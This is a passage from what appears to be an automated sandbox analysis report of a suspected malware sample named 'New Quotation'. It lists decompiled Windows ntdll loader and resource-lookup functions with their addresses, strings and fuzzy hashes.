					E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t64);
				}
				return _t76;
			}

















                                                                                                                                                                                          0x1d88bd10
                                                                                                                                                                                          0x1d88bd16
                                                                                                                                                                                          0x1d88bd1c
                                                                                                                                                                                          0x1d88bd1e
                                                                                                                                                                                          0x1d88bd21
                                                                                                                                                                                          0x1d88bd2b
                                                                                                                                                                                          0x1d88be3a
                                                                                                                                                                                          0x1d88be3a
                                                                                                                                                                                          0x1d88bd31
                                                                                                                                                                                          0x1d88bd31
                                                                                                                                                                                          0x1d88bd36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88bd45
                                                                                                                                                                                          0x1d88bd4e
                                                                                                                                                                                          0x1d88bd56
                                                                                                                                                                                          0x1d88bd5d
                                                                                                                                                                                          0x1d88bd65
                                                                                                                                                                                          0x1d88bd68
                                                                                                                                                                                          0x1d88bd69
                                                                                                                                                                                          0x1d88bd71
                                                                                                                                                                                          0x1d88bd78
                                                                                                                                                                                          0x1d88bd79
                                                                                                                                                                                          0x1d88bd7c
                                                                                                                                                                                          0x1d88bd86
                                                                                                                                                                                          0x1d88bd9b
                                                                                                                                                                                          0x1d88bda0
                                                                                                                                                                                          0x1d88bdb6
                                                                                                                                                                                          0x1d88bdb8
                                                                                                                                                                                          0x1d88bdbf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88bdc1
                                                                                                                                                                                          0x1d88bdc1
                                                                                                                                                                                          0x1d88bdc6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88bdc8
                                                                                                                                                                                          0x1d88bdce
                                                                                                                                                                                          0x1d88bde4
                                                                                                                                                                                          0x1d88bde8
                                                                                                                                                                                          0x1d88bdef
                                                                                                                                                                                          0x1d88be04
                                                                                                                                                                                          0x1d88be08
                                                                                                                                                                                          0x1d88be0e
                                                                                                                                                                                          0x1d88be2e
                                                                                                                                                                                          0x1d88be36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88be0e
                                                                                                                                                                                          0x1d88bdea
                                                                                                                                                                                          0x1d88bdea
                                                                                                                                                                                          0x1d88bdea
                                                                                                                                                                                          0x1d88bde8
                                                                                                                                                                                          0x1d88bdce
                                                                                                                                                                                          0x1d88bdc6
                                                                                                                                                                                          0x1d88bd88
                                                                                                                                                                                          0x1d88bd88
                                                                                                                                                                                          0x1d88bd88
                                                                                                                                                                                          0x1d88bd8a
                                                                                                                                                                                          0x1d88bd8a
                                                                                                                                                                                          0x1d88bd86
                                                                                                                                                                                          0x1d88bd36
                                                                                                                                                                                          0x1d88be43
                                                                                                                                                                                          0x1d88be45
                                                                                                                                                                                          0x1d88be48
                                                                                                                                                                                          0x1d88be48
                                                                                                                                                                                          0x1d88be4f
                                                                                                                                                                                          0x1d88be5d
                                                                                                                                                                                          0x1d88be5d
                                                                                                                                                                                          0x1d88be68

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • @, xrefs: 1D88BD71
                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 1D88BD45
                                                                                                                                                                                          • PreferredUILanguages, xrefs: 1D88BD92
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                          • API String ID: 0-2968386058
                                                                                                                                                                                          • Opcode ID: fe7d7041829f11d3e033bc0e2ea1e2de0c3d93fd9b9c7aebd0990cd1c1b5a50c
                                                                                                                                                                                          • Instruction ID: e7fc97d3e7be59030159bf6327f202dce0e6b64bc18066ca4273470c22462f3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: fe7d7041829f11d3e033bc0e2ea1e2de0c3d93fd9b9c7aebd0990cd1c1b5a50c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A417371D0024AFFDB11CF94C891FEEB7B8AF44714F018069E605B7251D774AA44CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D863CD4 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E1D863CD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				short _t35;
				short _t36;
				intOrPtr _t38;
				void* _t54;
				signed char* _t55;
				signed char* _t61;
				signed char _t65;
				signed int _t76;
				void* _t81;
				signed char* _t83;
				void* _t86;

				_push(0x6c);
				_push(0x1d8acf60);
				E1D827C40(__ebx, __edi, __esi);
				_t81 = __ecx;
				_t65 = 0x3a;
				 *(_t86 - 0x50) = _t65;
				_t35 = 0x3c;
				 *((short*)(_t86 - 0x4e)) = _t35;
				 *(_t86 - 0x4c) = L"LdrpResValidateFilePath Enter";
				_t36 = 0x38;
				 *((short*)(_t86 - 0x58)) = _t36;
				 *(_t86 - 0x56) = _t65;
				 *(_t86 - 0x54) = L"LdrpResValidateFilePath Exit";
				if(E1D7E3C40() == 0) {
					_t66 = 0x7ffe0385;
				} else {
					_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				if(( *_t66 & 0x00000001) == 0) {
					_t61 = 0x7ffe0384;
				} else {
					_t54 = E1D7E3C40();
					_t61 = 0x7ffe0384;
					if(_t54 == 0) {
						_t55 = 0x7ffe0384;
					} else {
						_t55 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_t66 = _t86 - 0x50;
					E1D85FC01(_t86 - 0x50,  *_t55 & 0x000000ff);
				}
				if(_t81 != 0) {
					 *((intOrPtr*)(_t86 - 4)) = 0;
					_t38 = E1D7D34C0(_t81);
					 *((intOrPtr*)(_t86 - 0x7c)) = _t38;
					 *((intOrPtr*)(_t86 - 4)) = 0xfffffffe;
					if(_t38 == 1 || _t38 == 2 || _t38 == 6) {
						if(E1D7F1BA0(_t66, _t81, _t86 - 0x60, 0, 0) != 0) {
							 *((intOrPtr*)(_t86 - 0x78)) = 0x18;
							 *((intOrPtr*)(_t86 - 0x74)) = 0;
							 *((intOrPtr*)(_t86 - 0x6c)) = 0x40;
							 *((intOrPtr*)(_t86 - 0x70)) = _t86 - 0x60;
							 *((intOrPtr*)(_t86 - 0x68)) = 0;
							 *((intOrPtr*)(_t86 - 0x64)) = 0;
							_push(_t86 - 0x44);
							_push(_t86 - 0x78);
							_t76 = E1D812D80();
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t86 - 0x5c)));
							if(_t76 >= 0) {
								asm("sbb edi, edi");
								_t76 =  ~( *(_t86 - 0x24) & 0x10) & 0xc000000d;
							}
						} else {
							_t76 = 0xc000003a;
						}
						goto L18;
					} else {
						goto L10;
					}
				} else {
					L10:
					_t76 = 0xc000000d;
					L18:
					_t83 = 0x7ffe0385;
					if(E1D7E3C40() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t83 & 0x00000001) != 0) {
						if(E1D7E3C40() != 0) {
							_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						E1D85FC01(_t86 - 0x58,  *_t61 & 0x000000ff);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0x10));
					return _t76;
				}
			}














                                                                                                                                                                                          0x1d863cd4
                                                                                                                                                                                          0x1d863cd6
                                                                                                                                                                                          0x1d863cdb
                                                                                                                                                                                          0x1d863ce0
                                                                                                                                                                                          0x1d863ce4
                                                                                                                                                                                          0x1d863ce5
                                                                                                                                                                                          0x1d863ceb
                                                                                                                                                                                          0x1d863cec
                                                                                                                                                                                          0x1d863cf0
                                                                                                                                                                                          0x1d863cf9
                                                                                                                                                                                          0x1d863cfa
                                                                                                                                                                                          0x1d863cfe
                                                                                                                                                                                          0x1d863d02
                                                                                                                                                                                          0x1d863d10
                                                                                                                                                                                          0x1d863d23
                                                                                                                                                                                          0x1d863d12
                                                                                                                                                                                          0x1d863d1b
                                                                                                                                                                                          0x1d863d1b
                                                                                                                                                                                          0x1d863d2b
                                                                                                                                                                                          0x1d863d5a
                                                                                                                                                                                          0x1d863d2d
                                                                                                                                                                                          0x1d863d2d
                                                                                                                                                                                          0x1d863d32
                                                                                                                                                                                          0x1d863d39
                                                                                                                                                                                          0x1d863d4b
                                                                                                                                                                                          0x1d863d3b
                                                                                                                                                                                          0x1d863d44
                                                                                                                                                                                          0x1d863d44
                                                                                                                                                                                          0x1d863d50
                                                                                                                                                                                          0x1d863d53
                                                                                                                                                                                          0x1d863d53
                                                                                                                                                                                          0x1d863d61
                                                                                                                                                                                          0x1d863d6f
                                                                                                                                                                                          0x1d863d73
                                                                                                                                                                                          0x1d863d78
                                                                                                                                                                                          0x1d863d7b
                                                                                                                                                                                          0x1d863d85
                                                                                                                                                                                          0x1d863d9f
                                                                                                                                                                                          0x1d863dab
                                                                                                                                                                                          0x1d863db2
                                                                                                                                                                                          0x1d863db5
                                                                                                                                                                                          0x1d863dbf
                                                                                                                                                                                          0x1d863dc2
                                                                                                                                                                                          0x1d863dc5
                                                                                                                                                                                          0x1d863dcb
                                                                                                                                                                                          0x1d863dcf
                                                                                                                                                                                          0x1d863dd5
                                                                                                                                                                                          0x1d863de4
                                                                                                                                                                                          0x1d863deb
                                                                                                                                                                                          0x1d863df7
                                                                                                                                                                                          0x1d863df9
                                                                                                                                                                                          0x1d863df9
                                                                                                                                                                                          0x1d863da1
                                                                                                                                                                                          0x1d863da1
                                                                                                                                                                                          0x1d863da1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d863d63
                                                                                                                                                                                          0x1d863d63
                                                                                                                                                                                          0x1d863d63
                                                                                                                                                                                          0x1d863e21
                                                                                                                                                                                          0x1d863e21
                                                                                                                                                                                          0x1d863e2d
                                                                                                                                                                                          0x1d863e38
                                                                                                                                                                                          0x1d863e38
                                                                                                                                                                                          0x1d863e41
                                                                                                                                                                                          0x1d863e4a
                                                                                                                                                                                          0x1d863e55
                                                                                                                                                                                          0x1d863e55
                                                                                                                                                                                          0x1d863e61
                                                                                                                                                                                          0x1d863e61
                                                                                                                                                                                          0x1d863e6b
                                                                                                                                                                                          0x1d863e77
                                                                                                                                                                                          0x1d863e77

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                          • API String ID: 0-1373925480
                                                                                                                                                                                          • Opcode ID: e86df6c0eec50a778fa7823b7116be1e6492337c6a301b5db166f3d29628f5c0
                                                                                                                                                                                          • Instruction ID: abb69c959ad8c8fd0310c00eb25ba92bdc93a0ffe8a2d1b56a5406952fae009d
                                                                                                                                                                                          • Opcode Fuzzy Hash: e86df6c0eec50a778fa7823b7116be1e6492337c6a301b5db166f3d29628f5c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1041D232905698CBDB12CBA4D844BADB7B8EF45760F19009AE915EF3A1D7369900CB22
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D851D5E Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                          			E1D851D5E(char __ecx) {
				char _v8;
				char _v12;
				signed char _t9;
				void* _t11;
				char _t20;

				_t9 =  *0x1d8c37c0; // 0x0
				_t20 = __ecx;
				if((_t9 & 0x00000003) != 0) {
					E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x79d, "LdrpInitializationFailure", 0, "Process initialization failed with status 0x%08lx\n", __ecx);
					_t9 =  *0x1d8c37c0; // 0x0
				}
				if((_t9 & 0x00000010) != 0) {
					asm("int3");
				}
				_t11 = E1D850371( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38, 0x1d7b11f8);
				if( *0x1d8c5a9c == 0) {
					_v8 = _t20;
					_push( &_v12);
					_push(1);
					_push( &_v8);
					_push(0);
					_push(1);
					_push(0xc0000145);
					_t11 = E1D814020();
				}
				return _t11;
			}








                                                                                                                                                                                          0x1d851d63
                                                                                                                                                                                          0x1d851d6c
                                                                                                                                                                                          0x1d851d70
                                                                                                                                                                                          0x1d851d89
                                                                                                                                                                                          0x1d851d8e
                                                                                                                                                                                          0x1d851d93
                                                                                                                                                                                          0x1d851d98
                                                                                                                                                                                          0x1d851d9a
                                                                                                                                                                                          0x1d851d9a
                                                                                                                                                                                          0x1d851dac
                                                                                                                                                                                          0x1d851db8
                                                                                                                                                                                          0x1d851dbd
                                                                                                                                                                                          0x1d851dc0
                                                                                                                                                                                          0x1d851dc1
                                                                                                                                                                                          0x1d851dc6
                                                                                                                                                                                          0x1d851dc7
                                                                                                                                                                                          0x1d851dc9
                                                                                                                                                                                          0x1d851dcb
                                                                                                                                                                                          0x1d851dd0
                                                                                                                                                                                          0x1d851dd0
                                                                                                                                                                                          0x1d851dd7

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 1D851D73
                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1D851D84
                                                                                                                                                                                          • LdrpInitializationFailure, xrefs: 1D851D7A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                          • API String ID: 0-2986994758
                                                                                                                                                                                          • Opcode ID: 4cc0a2d562b6cb7284719379ed6c57e1dda9aa4b3338ec089e3e1876bb3d2a7a
                                                                                                                                                                                          • Instruction ID: 7d1fd748a0b39958cb83d5e6c203d87bc94d3472cca861dd390a212b385f2437
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cc0a2d562b6cb7284719379ed6c57e1dda9aa4b3338ec089e3e1876bb3d2a7a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43F0CDB5A01218EBD620D74DCC96FEA3779EB00BA4F500055FA086B282C7B0BA00C693
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D6E00 Relevance: 3.1, APIs: 2, Instructions: 107timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                          			E1D7D6E00(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* __ebx;
				void* _t39;
				intOrPtr* _t44;
				char* _t45;
				intOrPtr* _t53;
				char* _t54;
				intOrPtr _t63;
				intOrPtr _t82;
				intOrPtr _t85;

				_push(__ecx);
				_t63 = _a4;
				_t82 = _a8;
				_t85 =  *((intOrPtr*)(_t82 + 0x88));
				if(_t85 != 0) {
					_t39 = E1D7F2120(_t63, __ecx, 0, _t85);
					if(_t39 >= 0) {
						 *(_t63 + 0x50) =  *(_t63 + 0x50) | 0x00000100;
						 *((intOrPtr*)(_t63 + 0x64)) = _t85;
						goto L1;
					}
				} else {
					L1:
					_t4 = _t82 + 0x30; // 0x40
					asm("lock inc dword [esi]");
					E1D7D71C9(_t82);
					_t5 = _t82 + 0x50; // 0x60
					E1D7FDB40(_t5, 1, 0);
					E1D7D7007(_t63, _t4);
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L2;
						} else {
							_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							goto L3;
						}
						goto L10;
					} else {
						L2:
						_t45 = 0x7ffe0386;
					}
					L3:
					if( *_t45 != 0) {
						E1D8A4C59( *((intOrPtr*)(_t82 + 0x8c)), _t82,  *((intOrPtr*)(_t82 + 0x60)),  *((intOrPtr*)(_t82 + 0x64)),  *((intOrPtr*)(_t82 + 0x6c)));
					}
					E1D7D6F4C( &_v8,  *((intOrPtr*)(_t82 + 0x60)),  *((intOrPtr*)(_t82 + 0x64)),  *((intOrPtr*)(_t82 + 0x6c)));
					 *((intOrPtr*)(_t63 + 0x30)) =  *((intOrPtr*)(_t82 + 0x60));
					 *((intOrPtr*)(_t63 + 0x34)) =  *((intOrPtr*)(_t82 + 0x64));
					if(( *(_t82 + 0xb4) & 0x00000001) == 0) {
						 *0x1d8c91e0(_t63,  *((intOrPtr*)(_t82 + 0x64)), _t82);
						 *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x60))))();
					} else {
						 *((intOrPtr*)(_t63 + 0x4c)) = _t82;
						 *0x1d8c91e0(_t63,  *((intOrPtr*)(_t82 + 0x64)), _t82, _a12);
						 *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x60))))();
					}
					_t53 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t53 != 0) {
						if( *_t53 == 0) {
							goto L7;
						} else {
							_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							goto L8;
						}
						L20:
					} else {
						L7:
						_t54 = 0x7ffe0386;
					}
					L8:
					if( *_t54 != 0) {
						E1D8A4CD2( *((intOrPtr*)(_t82 + 0x8c)), _t82,  *((intOrPtr*)(_t82 + 0x60)),  *((intOrPtr*)(_t82 + 0x64)),  *((intOrPtr*)(_t82 + 0x6c)));
					}
					_t39 = E1D7D6ECF(_v8);
				}
				L10:
				return _t39;
				goto L20;
			}













                                                                                                                                                                                          0x1d7d6e05
                                                                                                                                                                                          0x1d7d6e07
                                                                                                                                                                                          0x1d7d6e0c
                                                                                                                                                                                          0x1d7d6e0f
                                                                                                                                                                                          0x1d7d6e17
                                                                                                                                                                                          0x1d831490
                                                                                                                                                                                          0x1d831497
                                                                                                                                                                                          0x1d83149d
                                                                                                                                                                                          0x1d8314a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8314a4
                                                                                                                                                                                          0x1d7d6e1d
                                                                                                                                                                                          0x1d7d6e1d
                                                                                                                                                                                          0x1d7d6e1d
                                                                                                                                                                                          0x1d7d6e20
                                                                                                                                                                                          0x1d7d6e25
                                                                                                                                                                                          0x1d7d6e2c
                                                                                                                                                                                          0x1d7d6e32
                                                                                                                                                                                          0x1d7d6e3b
                                                                                                                                                                                          0x1d7d6e46
                                                                                                                                                                                          0x1d7d6e4b
                                                                                                                                                                                          0x1d8314af
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8314b5
                                                                                                                                                                                          0x1d8314be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8314be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6e51
                                                                                                                                                                                          0x1d7d6e51
                                                                                                                                                                                          0x1d7d6e51
                                                                                                                                                                                          0x1d7d6e51
                                                                                                                                                                                          0x1d7d6e56
                                                                                                                                                                                          0x1d7d6e59
                                                                                                                                                                                          0x1d8314d9
                                                                                                                                                                                          0x1d8314d9
                                                                                                                                                                                          0x1d7d6e6b
                                                                                                                                                                                          0x1d7d6e73
                                                                                                                                                                                          0x1d7d6e79
                                                                                                                                                                                          0x1d7d6e83
                                                                                                                                                                                          0x1d8314ed
                                                                                                                                                                                          0x1d8314f3
                                                                                                                                                                                          0x1d7d6e89
                                                                                                                                                                                          0x1d7d6e8c
                                                                                                                                                                                          0x1d7d6e99
                                                                                                                                                                                          0x1d7d6e9f
                                                                                                                                                                                          0x1d7d6e9f
                                                                                                                                                                                          0x1d7d6ea7
                                                                                                                                                                                          0x1d7d6eac
                                                                                                                                                                                          0x1d8314fd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d831503
                                                                                                                                                                                          0x1d83150c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83150c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6eb2
                                                                                                                                                                                          0x1d7d6eb2
                                                                                                                                                                                          0x1d7d6eb2
                                                                                                                                                                                          0x1d7d6eb2
                                                                                                                                                                                          0x1d7d6eb7
                                                                                                                                                                                          0x1d7d6eba
                                                                                                                                                                                          0x1d831527
                                                                                                                                                                                          0x1d831527
                                                                                                                                                                                          0x1d7d6ec3
                                                                                                                                                                                          0x1d7d6ec3
                                                                                                                                                                                          0x1d7d6ec8
                                                                                                                                                                                          0x1d7d6ecc
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: d5a9fb2e41c88d92f33db627e264c5f55359b85e025d93ed891680547d2be601
                                                                                                                                                                                          • Instruction ID: db8ccdb36755c6fcf8d8644856fed30941f794625e8823827f1c018daaf12111
                                                                                                                                                                                          • Opcode Fuzzy Hash: d5a9fb2e41c88d92f33db627e264c5f55359b85e025d93ed891680547d2be601
                                                                                                                                                                                          • Instruction Fuzzy Hash: A1415E35604B46FFCB568F28C884F5ABBB6FF88B10F018156E90587661CB35F820CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7DA8F0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E1D7DA8F0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				short _t151;
				short _t152;
				signed int* _t154;
				signed char* _t155;
				signed int _t156;
				signed int _t157;
				signed int* _t160;
				signed int _t161;
				signed int _t163;
				signed int _t167;
				signed int _t169;
				signed int _t171;
				signed int _t173;
				signed int _t179;
				signed int _t180;
				signed int _t185;
				signed int _t186;
				signed int _t191;
				signed int _t196;
				signed int _t198;
				signed int _t200;
				signed int _t206;
				signed int _t210;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				signed int _t225;
				short _t227;
				signed char* _t229;
				signed int _t246;
				intOrPtr _t254;
				signed int _t256;
				signed int _t257;
				signed int _t259;
				signed int _t263;
				intOrPtr _t265;
				signed int _t267;
				signed int _t268;
				void* _t270;
				signed int _t290;

				_push(0x74);
				_push(0x1d8abf08);
				E1D827C40(__ebx, __edi, __esi);
				_t263 =  *(_t270 + 8);
				 *(_t270 - 0x3c) = _t263;
				_t246 =  *(_t270 + 0xc);
				 *(_t270 - 0x50) = _t246;
				 *((intOrPtr*)(_t270 - 0x4c)) =  *((intOrPtr*)(_t270 + 0x18));
				 *(_t270 - 0x44) =  *(_t270 + 0x1c);
				_t254 =  *((intOrPtr*)(_t270 + 0x20));
				 *((intOrPtr*)(_t270 - 0x48)) = _t254;
				 *(_t270 - 0x40) =  *(_t270 + 0x24);
				 *(_t270 - 0x38) = 0;
				_t227 = 0x34;
				 *((short*)(_t270 - 0x74)) = _t227;
				_t151 = 0x36;
				 *((short*)(_t270 - 0x72)) = _t151;
				 *(_t270 - 0x70) = L"LdrResSearchResource Enter";
				_t152 = 0x32;
				 *((short*)(_t270 - 0x7c)) = _t152;
				 *((short*)(_t270 - 0x7a)) = _t227;
				 *(_t270 - 0x78) = L"LdrResSearchResource Exit";
				_t154 =  *( *[fs:0x30] + 0x50);
				if(_t154 != 0) {
					__eflags =  *_t154;
					if( *_t154 == 0) {
						goto L1;
					}
					_t155 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					if(( *_t155 & 0x00000001) != 0) {
						_t156 = E1D7E3C40();
						_t222 = 0x7ffe0384;
						__eflags = _t156;
						if(_t156 == 0) {
							_t157 = 0x7ffe0384;
						} else {
							_t157 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E1D85FC01(_t270 - 0x74,  *_t157 & 0x000000ff);
						_t246 =  *(_t270 - 0x50);
					} else {
						_t222 = 0x7ffe0384;
					}
					if(_t263 == 0 || _t246 == 0) {
						L56:
						 *(_t270 - 0x30) = 0xc000000d;
						goto L22;
					} else {
						if(_t254 != 0) {
							__eflags =  *(_t270 - 0x40);
							if( *(_t270 - 0x40) != 0) {
								goto L7;
							}
							goto L56;
						}
						L7:
						_t225 =  *(_t270 + 0x14);
						if((_t225 & 0x00000f00) == 0) {
							_t225 = _t225 | 0x00000100;
						}
						if((_t225 & 0x00002000) == 0) {
							_t225 = _t225 | 0x00001000;
						}
						if((_t225 & 0xfff80000) != 0) {
							L20:
							 *(_t270 - 0x30) = 0xc00000f2;
							goto L21;
						} else {
							_t256 =  *(_t270 + 0x10);
							if(_t256 < 3) {
								__eflags = _t225 & 0x00000002;
								if((_t225 & 0x00000002) != 0) {
									goto L12;
								}
								L57:
								 *(_t270 - 0x30) = 0xc00000f1;
								L21:
								_t222 = 0x7ffe0384;
								L22:
								_t229 = 0x7ffe0385;
								_t160 =  *( *[fs:0x30] + 0x50);
								if(_t160 != 0) {
									__eflags =  *_t160;
									if( *_t160 != 0) {
										_t229 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
								}
								if(( *_t229 & 0x00000001) != 0) {
									_t161 = E1D7E3C40();
									__eflags = _t161;
									if(_t161 != 0) {
										_t222 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
									E1D85FC01(_t270 - 0x7c,  *_t222 & 0x000000ff);
									goto L24;
								} else {
									L24:
									_t163 =  *(_t270 - 0x30);
									L25:
									 *[fs:0x0] =  *((intOrPtr*)(_t270 - 0x10));
									return _t163;
								}
							}
							L12:
							if(_t256 > 4) {
								goto L57;
							}
							_t167 = _t225 & 0x00000041;
							if(_t167 != 0) {
								__eflags = _t256 - 4;
								if(_t256 != 4) {
									_t163 = 0xc00000f1;
									goto L25;
								}
								L46:
								__eflags = _t167;
								if(_t167 != 0) {
									L15:
									if((_t225 & 0x00000100) == 0) {
										_t169 = _t225 & 0x00000c00;
										__eflags = _t225 & 0x00000200;
										if((_t225 & 0x00000200) == 0) {
											__eflags = _t169 - 0xc00;
											if(_t169 == 0xc00) {
												goto L20;
											}
											L18:
											_t171 = _t225 & 0x00008000;
											 *(_t270 - 0x50) = _t171;
											if(_t171 != 0) {
												_t173 =  !_t225;
												__eflags = _t173 & 0x00000810;
												if((_t173 & 0x00000810) != 0) {
													goto L20;
												}
											}
											if((_t225 & 0x00003000) != 0x3000) {
												__eflags = (_t225 & 0x00000018) - 0x18;
												if((_t225 & 0x00000018) == 0x18) {
													goto L20;
												}
												 *(_t270 - 0x34) = 0;
												__eflags = _t225 & 0x00020000;
												if((_t225 & 0x00020000) != 0) {
													 *((intOrPtr*)(_t270 - 4)) = 0;
													__eflags = _t225 & 0x00000400;
													if((_t225 & 0x00000400) == 0) {
														L70:
														 *(_t270 - 0x30) = 0xc000000d;
														 *((intOrPtr*)(_t270 - 4)) = 0xfffffffe;
														goto L21;
													}
													_t179 =  *(_t270 - 0x44);
													__eflags = _t179;
													if(_t179 == 0) {
														goto L70;
													}
